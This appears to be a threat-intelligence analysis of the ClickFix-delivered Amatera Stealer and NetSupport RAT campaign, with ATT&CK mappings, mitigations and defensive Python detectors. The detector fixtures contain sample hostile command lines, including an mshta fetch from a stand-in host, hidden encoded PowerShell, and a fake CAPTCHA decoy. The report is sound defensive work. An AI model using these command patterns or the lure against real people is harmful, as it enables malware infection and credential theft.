Full Report
Cybersecurity researchers have discovered malware campaigns using the now-prevalent ClickFix social engineering tactic to deploy Amatera Stealer and NetSupport RAT. The activity, observed this month, is being tracked by eSentire under the moniker EVALUSION. First spotted in June 2025, Amatera is assessed to be an evolution of ACR (short for "AcridRain") Stealer, which was available under the
Analysis Summary
# Tool/Technique: Amatera Stealer
## Overview
Amatera Stealer is a sophisticated information stealer malware, observed being deployed in the EVALUSION campaign, which uses the ClickFix social engineering tactic. It is assessed to be an evolution of the older ACR (AcridRain) Stealer and is offered as Malware-as-a-Service (MaaS). Its primary purpose is extensive data exfiltration from compromised systems.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (implied by use of mshta.exe, PowerShell, WoW64 SysCalls, MSBuild.exe)
- Capabilities: Crypto-wallet theft, browser credential theft, messaging and FTP client data exfiltration, email service data theft, advanced evasion.
- First Seen: June 2025
## MITRE ATT&CK Mapping
*Note: Mappings reflect the behavior reported in the text; the one entry marked "not reported" is typical stealer behavior rather than something the article describes.*
- **TA0002 - Execution**
- T1204.004 - User Execution: Malicious Copy and Paste (the ClickFix command pasted into the Run dialog)
- T1059.001 - Command and Scripting Interpreter: PowerShell (script launched by mshta.exe; the domain/wallet check)
- **TA0005 - Defense Evasion**
- T1027.002 - Obfuscated Files or Information: Software Packing (PureCrypter)
- T1218.005 - System Binary Proxy Execution: Mshta
- T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild
- T1055 - Process Injection (stealer DLL injected into MSBuild.exe)
- T1106 - Native API (WoW64 syscalls used to bypass user-mode hooks)
- T1070.004 - Indicator Removal: File Deletion (not reported in the text; listed only as typical cleanup behavior)
- **TA0006 - Credential Access**
- T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
- T1555 - Credentials from Password Stores (FTP, messaging and email client credentials)
- **TA0007 - Discovery**
- T1082 - System Information Discovery (domain-membership check before the second stage)
- T1083 - File and Directory Discovery (search for crypto-wallet files)
- **TA0009 - Collection**
- T1005 - Data from Local System (wallet and client data)
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols (C2 and payload retrieval)
- T1105 - Ingress Tool Transfer (Amatera from MediaFire; NetSupport RAT from the operator's server)
## Functionality
### Core Capabilities
- **Data Exfiltration:** Targets sensitive data including crypto-wallets, browser credentials, instant messaging application data, FTP client credentials, and email services data.
- **MaaS Model:** Available for purchase via subscription plans ranging from $199/month to $1,499/year.
### Advanced Features
- **Evasion Techniques:** Issues system calls through the **WoW64** 32-bit-to-64-bit transition instead of through the ntdll.dll exports that sandboxes, Anti-Virus (AV) and Endpoint Detection and Response (EDR) products hook in user mode, so those hooks never see the calls.
- **Selective Payload Delivery:** The stealer runs first; a PowerShell check then decides whether the machine is worth a second stage (domain-joined, or holding files of 'potential value' such as crypto wallets) before NetSupport RAT is downloaded and executed.
- **Loading Mechanism:** The stealer is a .NET DLL packed with PureCrypter; on first execution the loader injects it into an **MSBuild.exe** process.
## Indicators of Compromise
*The article provides procedural indicators rather than hashes or C2 addresses, focusing on the delivery mechanism.*
- File Hashes: [Not provided in the text]
- File Names: [Not provided in the text]; the stealer is delivered as a **.NET DLL** packed with PureCrypter
- Registry Keys: [Not provided in the text]
- Network Indicators: Initial stage fetched from MediaFire; NetSupport RAT downloaded from an operator-controlled server post-infection (domains/IPs not given in the text)
- Behavioral Indicators:
- Execution chain starts via **Windows Run dialog** triggered by ClickFix social engineering.
- Uses **mshta.exe** to launch an initial **PowerShell script**.
- Downloads secondary stage from **MediaFire** (file hosting service).
- Injects payload into the **MSBuild.exe** process.
## Associated Threat Actors
- Threat actors utilizing MaaS offerings (Amatera and PureCrypter). The activity cluster is tracked as **EVALUSION** by eSentire.
## Detection Methods
- Signature-based detection: Signatures for the PureCrypter packing/loader stub that carries the stealer DLL.
- Behavioral detection: Process chains rooted in the Run dialog (`explorer.exe` as parent) in which `mshta.exe` is started with a URL or inline script argument and then spawns PowerShell; `MSBuild.exe` started without a project file by a non-build parent, or making network connections; data-collection patterns touching known wallet and browser credential stores.
- YARA rules: [Not provided in the text, but the PureCrypter stub and the injection routine are natural signature targets.]
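As an added example (not code from eSentire or the article), the behavioral rules above applied to Sysmon Event ID 1 process-creation records. The records, process IDs, paths and command lines are constructed for the demo; the Run-dialog rule relies on the fact that Explorer is the parent of whatever Win+R launches, and the MSBuild rule on the loader starting `MSBuild.exe` with no project file.

```python
"""Flag the ClickFix -> mshta.exe -> PowerShell -> MSBuild.exe chain in
Sysmon Event ID 1 (process creation) records.

Added example; not code from eSentire or the article. The records below are
constructed for the demo. Field names follow Sysmon's Event ID 1 schema
(Image, ParentImage, CommandLine, ProcessId, ParentProcessId).
"""
import re
from dataclasses import dataclass

# Constructed Sysmon-like process-creation records (not from a real host).
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    # Command pasted into Win+R: explorer.exe is the parent of whatever the Run dialog starts.
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/verify/c.hta"},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc SQBFAFgA..."},
    # Loader spawns MSBuild.exe with no project file: the injection target.
    {"ProcessId": 400, "ParentProcessId": 300,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": "MSBuild.exe"},
    # Benign: a developer build started from Visual Studio (parent not in the log).
    {"ProcessId": 500, "ParentProcessId": 99,
     "Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": 'MSBuild.exe "C:\\src\\app\\app.csproj" /t:Build'},
    # Benign: an admin opens notepad from the Run dialog.
    {"ProcessId": 600, "ParentProcessId": 100, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Parents from which MSBuild.exe is normally launched (assumed allow-list).
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}
PROJECT_ARG = re.compile(r"\.(?:csproj|vbproj|proj|sln|targets)\b", re.I)
# mshta with a remote URL, UNC path or inline script protocol handler.
REMOTE_OR_INLINE = re.compile(r"https?://|\\\\|javascript:|vbscript:", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


@dataclass
class Alert:
    rule: str
    pid: int
    detail: str


def analyze(events):
    """Apply the three process-chain rules and return the alerts in event order."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        img = basename(e["Image"])
        parent = by_pid.get(e["ParentProcessId"])
        pimg = basename(parent["Image"]) if parent else ""
        cmd = e["CommandLine"]
        if img == "mshta.exe" and REMOTE_OR_INLINE.search(cmd):
            where = "from Run dialog (explorer.exe parent)" if pimg == "explorer.exe" else f"parent {pimg or 'unknown'}"
            alerts.append(Alert("mshta_remote_script", e["ProcessId"], f"{where}: {cmd}"))
        if img in {"powershell.exe", "pwsh.exe"} and pimg == "mshta.exe":
            alerts.append(Alert("mshta_spawns_powershell", e["ProcessId"], cmd))
        if img == "msbuild.exe" and pimg not in BUILD_PARENTS and not PROJECT_ARG.search(cmd):
            alerts.append(Alert("msbuild_no_project", e["ProcessId"], f"parent {pimg or 'unknown'}: {cmd}"))
    return alerts


def chain_from_run_dialog(events, pid):
    """Walk ParentProcessId links back to explorer.exe; return image names root-first,
    or [] when the chain does not reach explorer.exe within the log."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["Image"]))
        if chain[-1] == "explorer.exe":
            return list(reversed(chain))
        pid = by_pid[pid]["ParentProcessId"]
    return []


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid={a.pid} {a.detail}")
    print(" -> ".join(chain_from_run_dialog(SAMPLE_EVENTS, 400)))
```

Against the constructed records the three rules fire once each (pids 200, 300 and 400), the Visual Studio build is ignored because its command line names a `.csproj`, and the injected `MSBuild.exe` walks back to `explorer.exe` through `powershell.exe` and `mshta.exe`, which is the shape of the chain the report describes.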
## Mitigation Strategies
- **User Training:** Teach users to recognise ClickFix lures, in particular any "verification" page that asks them to press Win+R and paste a command.
- **Application Control:** Block or tightly restrict `mshta.exe` (and, on machines that do not build software, `MSBuild.exe`) with AppLocker or WDAC, and alert on either spawning PowerShell.
- **EDR/AV Configuration:** Prefer products whose telemetry does not depend solely on user-mode hooks (kernel callbacks, ETW-based threat-intelligence providers), since the WoW64 syscall technique exists precisely to sidestep those hooks.
- **Privilege Separation:** Run users without local administrator rights to reduce the impact of successful code execution.
## Related Tools/Techniques
- **PureCrypter:** Used as the crypter/loader for the Amatera Stealer DLL.
- **NetSupport RAT:** Secondary payload deployed after initial infection assessment.
- **ACR (AcridRain) Stealer:** Predecessor/baseline for Amatera.
- **ClickFix Tactic:** The primary social engineering vector causing initial execution.
- **XWorm**, **SmartApeSG/HANEYMANEY/ZPHP** (mentioned as concurrent malware campaigns using related infection methods).
---
# Tool/Technique: NetSupport RAT
## Overview
NetSupport RAT is a Remote Access Trojan observed being deployed as a secondary payload in the EVALUSION campaign, often following a successful infection by Amatera Stealer. It provides persistent remote control capabilities to the threat actor.
## Technical Details
- Type: Malware family (RAT - Remote Access Trojan)
- Platform: Windows (implied)
- Capabilities: Full interactive remote control of the host and execution of further commands.
- First Seen: In this context, campaigns dating back to at least June 2025; NetSupport RAT itself is the long-abused form of NetSupport Manager, a commercial remote-administration product.
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell (downloaded and launched by the post-check PowerShell command)
- **TA0003 - Persistence**
- (Not described in the text; persistence is a standard capability of the tool)
- **TA0011 - Command and Control**
- T1219 - Remote Access Software (NetSupport Manager client used as the RAT)
- T1105 - Ingress Tool Transfer (RAT fetched from an external server)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel (possible over the remote-control session; not described in the text)
## Functionality
### Core Capabilities
- **Delivery:** Fetched and launched by the PowerShell command Amatera issues after its environment check.
- **Remote Access:** Gives the operator interactive control of the compromised system.
### Advanced Features
- **Conditional Deployment:** Only deployed if the victim machine meets certain criteria (e.g., is part of a domain or contains crypto wallet files).
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names: [Not specified beyond being the RAT payload]
- Registry Keys: [Not provided in the text]
- Network Indicators: Communicates with the C2 infrastructure established for remote operations (C2 details not specified).
- Behavioral Indicators: Execution triggered by a post-infection PowerShell command initiated by Amatera.
## Associated Threat Actors
- Threat actors active in the EVALUSION campaign. Also associated with other observed campaigns utilizing compromised websites and malicious JavaScript redirecting to ClickFix lures.
## Detection Methods
- Detection focusing on the PowerShell command Amatera uses to fetch and launch the RAT (a download from an external server followed by execution of the dropped client).
- Signature-based detection of the NetSupport Manager client files. Not from the article, but well documented for abused NetSupport deployments: the bundle is typically dropped as `client32.exe` together with `client32.ini` (which holds the gateway address) and `NSM.LIC`, usually in a user-writable directory.
- Network detection of the gateway protocol: the client beacons over HTTP with a `NetSupport Manager/1.3` User-Agent (again general knowledge about the tool, not a detail from the article).
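An added example, not from the article or eSentire, of the network and file checks above: a marker check for NetSupport Manager gateway polling and a parser for the gateway address in `client32.ini`. Assumed rather than stated in the article: the User-Agent, the `fakeurl.htm` POST, the `CMD=POLL` body and the `[HTTP]` section layout follow what is commonly reported for NetSupport deployments, and the sample request and ini text are constructed, so confirm the markers against your own captures before deploying them as rules.

```python
"""Spot NetSupport Manager (abused as NetSupport RAT) gateway polling and pull
the gateway address out of its client32.ini.

Added example; not code from the article or eSentire. Assumptions: the HTTP
markers (User-Agent "NetSupport Manager/1.3", POST to /fakeurl.htm, CMD=POLL
body) and the client32.ini [HTTP] layout follow what is commonly reported for
NetSupport deployments. All sample data below is constructed.
"""
import configparser
import re

# Constructed sample traffic: one NetSupport poll, one ordinary browser request.
SAMPLE_REQUESTS = [
    "POST http://203.0.113.10/fakeurl.htm HTTP/1.1\r\n"
    "User-Agent: NetSupport Manager/1.3\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 203.0.113.10\r\n\r\n"
    "CMD=POLL\r\nINFO=1\r\nACK=1\r\n",
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: www.example.com\r\n\r\n",
]

# Constructed client32.ini in the shape commonly seen in dropped NetSupport bundles.
SAMPLE_CLIENT32_INI = """[Client]
Protocols=3
SilentDisconnect=1
[General]
License=NSM.LIC
[HTTP]
GatewayAddress=203.0.113.10:443
SecondaryGateway=gateway.example.invalid:443
Port=443
"""

UA_RE = re.compile(r"^User-Agent:\s*NetSupport Manager/", re.I | re.M)
REQ_RE = re.compile(r"^POST\s+\S*fakeurl\.htm\b", re.I | re.M)


def score_request(raw):
    """Return the NetSupport markers found in one raw HTTP request (empty list if none)."""
    head, _, body = raw.partition("\r\n\r\n")
    hits = []
    if UA_RE.search(head):
        hits.append("netsupport_user_agent")
    if REQ_RE.search(head):
        hits.append("fakeurl_post")
    if re.search(r"^CMD=POLL\b", body, re.M):
        hits.append("cmd_poll_body")
    return hits


def gateways_from_ini(text):
    """Extract gateway host:port values from the [HTTP] section of a client32.ini.
    configparser lowercases option names, so the lookups are case-insensitive."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    if "HTTP" not in cp:
        return []
    section = cp["HTTP"]
    return [section[k] for k in ("GatewayAddress", "SecondaryGateway") if k in section]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req.splitlines()[0], "->", score_request(req) or "clean")
    print("gateways:", gateways_from_ini(SAMPLE_CLIENT32_INI))
```

Any one marker on its own is weak (the User-Agent can be changed in the client configuration), so treat two or more as the alerting threshold, and feed the gateways recovered from `client32.ini` straight into egress blocking and retrospective proxy-log searches.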
## Mitigation Strategies
- **Network Segmentation:** Limit lateral movement, especially on domain-joined hosts, which are exactly the machines this campaign selects for the RAT.
- **Application Control:** Allow-list remote-administration software so that unapproved copies of the NetSupport client cannot run, and block its gateway traffic at the egress proxy where the product is not in legitimate use.
- **Principle of Least Privilege:** Keep users without administrator rights so the RAT cannot install itself as a service or otherwise persist system-wide.
## Related Tools/Techniques
- **Amatera Stealer:** Its post-infection PowerShell check decides whether NetSupport RAT is fetched at all.
- **ClickFix Tactic:** Frequently used vector in campaigns deploying this RAT (e.g., SmartApeSG campaign).
---
# Technique: ClickFix Social Engineering Tactic
## Overview
ClickFix is a prevalent social engineering tactic used to trick victims into executing malicious commands, often under the guise of completing a verification process (like reCAPTCHA or CAPTCHA). This method frequently results in the execution of PowerShell commands that download and deploy multi-stage malware payloads.
## Technical Details
- Type: Technique (Social Engineering/Initial Access)
- Platform: Windows (relies on Windows Run dialog)
- Capabilities: Talks the user into executing arbitrary commands themselves via the `Run` dialog; no browser exploit is involved, so exploit-focused protections do not apply.
- First Seen: Not stated; the report treats the tactic as already prevalent and cites earlier ClickFix campaigns (e.g., August 2025).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1189 - Drive-by Compromise (compromised websites with injected JavaScript redirecting to the lure)
- T1566.002 - Phishing: Spearphishing Link (emailed links to lure pages, e.g., fake invoices or booking confirmations)
- **TA0002 - Execution**
- T1204.004 - User Execution: Malicious Copy and Paste (the victim pastes and runs the command)
- T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0005 - Defense Evasion**
- T1218.005 - System Binary Proxy Execution: Mshta
## Functionality
### Core Capabilities
- **User Deception:** Tricking the user into interacting with a malicious link or viewing a malicious page (e.g., fake Cloudflare Turnstile or Booking.com CAPTCHA).
- **User-Driven Execution:** Guiding the user to paste and execute a specific malicious command in the Windows Run dialog (`Win+R`).
### Advanced Features
- **Multi-Stage Infection Chain:** The initial command executed often sets off a sequence involving `mshta.exe` to launch PowerShell, which fetches the main payload (e.g., Amatera Stealer distributed via MediaFire).
## Indicators of Compromise
- Behavioral Indicators: A command containing `mshta`, base64-encoded or otherwise obfuscated PowerShell, or a download URL executed from the Windows Run dialog right after the user visits a "verification" page. Explorer keeps the typed command in the user's RunMRU key (`HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`), so it is recoverable during triage even after the processes have exited.
## Associated Threat Actors
- Actors involved in the EVALUSION campaign, SmartApeSG (HANEYMANEY/ZPHP), and various phishing campaigns involving fake invoices or booking confirmations.
## Detection Methods
- Behavioral detection: Processes whose parent is `explorer.exe` and whose command line starts with `mshta`, `powershell`, `cmd` or `curl` and carries a URL or an encoded argument; `mshta.exe` spawning PowerShell; a browser session followed within seconds by such a Run-dialog launch.
- Network traffic to the fraudulent verification pages and to the hosts they instruct the victim to fetch from (including legitimate file hosts such as MediaFire when the request comes from `mshta.exe` or PowerShell rather than a browser).
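An added example (not the article's code) for the Run-dialog triage above: parse a RunMRU `.reg` export and flag ClickFix-looking entries. Assumed facts: Explorer stores each Run-dialog command as a value `a`, `b`, `c`, ... with a trailing `\1` and lists their order in `MRUList`, most recent first; the `.reg` text, hostnames and encoded blob are constructed, and the "decoy comment" heuristic (ClickFix commands commonly end in a `#` comment posing as a verification ID so the pasted line looks harmless) is a general observation about the tactic rather than something this report states.

```python
"""Triage the Run-dialog history (RunMRU) for ClickFix-style commands.

Added example, not from the article. Assumed facts: Explorer records each
command typed into Win+R under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU as values
a, b, c ... each ending in "\\1", with MRUList giving their order, most recent
first. The .reg text below is constructed, not a real export.
"""
import re

# Constructed .reg export; backslashes and quotes are escaped the way regedit writes them.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="mshta https://example.invalid/captcha/verify.hta # \"I am not a robot - reCAPTCHA Verification ID: 7391\"\\1"
"c"="powershell -w hidden -ep bypass -enc SQBFAFgA\\1"
"d"="\\\\fileserver\\share\\1"
"MRUList"="cbda"
'''

# Living-off-the-land binaries that rarely belong in a user's Run history.
LOLBINS = {"mshta", "powershell", "pwsh", "cmd", "curl", "certutil", "bitsadmin",
           "wscript", "cscript", "rundll32", "regsvr32", "msiexec"}
URL_RE = re.compile(r"https?://\S+", re.I)
PS_FLAGS_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand|ep|executionpolicy|w|windowstyle|nop|noprofile)\b", re.I)
# Trailing comment dressed up as a verification ID (assumed ClickFix decoy pattern).
DECOY_RE = re.compile(r"#.*?(?:not a robot|verification|captcha)", re.I)
VALUE_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"\s*$', re.M)


def parse_runmru(reg_text):
    """Return Run-dialog commands, most recent first, from a RunMRU .reg export."""
    values = {}
    for name, raw in VALUE_RE.findall(reg_text):
        values[name] = re.sub(r"\\(.)", r"\1", raw)  # undo .reg escaping (\\ and \")
    order = values.pop("MRUList", "")
    cmds = []
    for slot in order:
        v = values.get(slot)
        if v is None:
            continue
        cmds.append(v[:-2] if v.endswith("\\1") else v)  # strip Explorer's "\1" suffix
    return cmds


def classify(cmd):
    """Return the list of reasons a Run-dialog command looks like a ClickFix payload."""
    reasons = []
    first = cmd.strip().split()[0].lower() if cmd.strip() else ""
    first = first.rsplit("\\", 1)[-1]
    if first.endswith(".exe"):
        first = first[:-4]
    if first in LOLBINS:
        reasons.append(f"lolbin:{first}")
    if URL_RE.search(cmd):
        reasons.append("url")
    if PS_FLAGS_RE.search(cmd):
        reasons.append("ps_flags")
    if DECOY_RE.search(cmd):
        reasons.append("captcha_decoy_comment")
    return reasons


def triage(reg_text):
    """Pair each recovered command with its reasons, most recent first."""
    return [(c, classify(c)) for c in parse_runmru(reg_text)]


if __name__ == "__main__":
    for cmd, reasons in triage(SAMPLE_REG_EXPORT):
        print(("SUSPECT " if reasons else "ok      ") + cmd, reasons)
```

The UNC path and `notepad` come back clean while the `mshta` and encoded `powershell` entries are flagged; on a live host the same key can be read with `reg export` or directly from the `NTUSER.DAT` hive of the affected profile, and the timestamp of the key's last write brackets when the user pasted the command.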
## Mitigation Strategies
- **Security Awareness Training:** Make the rule concrete for users: no legitimate website ever asks you to press Win+R and paste a command to prove you are human.
- **Restrict User Rights:** Block `mshta.exe` for standard users with AppLocker or WDAC, constrain PowerShell (Constrained Language Mode, script block logging) and, where the Run dialog is not needed, disable it with the Explorer `NoRun` policy.
- **Endpoint Hardening:** Alert on or block PowerShell launched from unusual parents such as `mshta.exe` or `wscript.exe`, or directly from `explorer.exe` with an encoded command.
## Related Tools/Techniques
- **Amatera Stealer** and **NetSupport RAT** (Directly deployed using this technique).
- Use of **Visual Basic Script** attachments (VBS) to achieve similar command execution goals in other campaigns.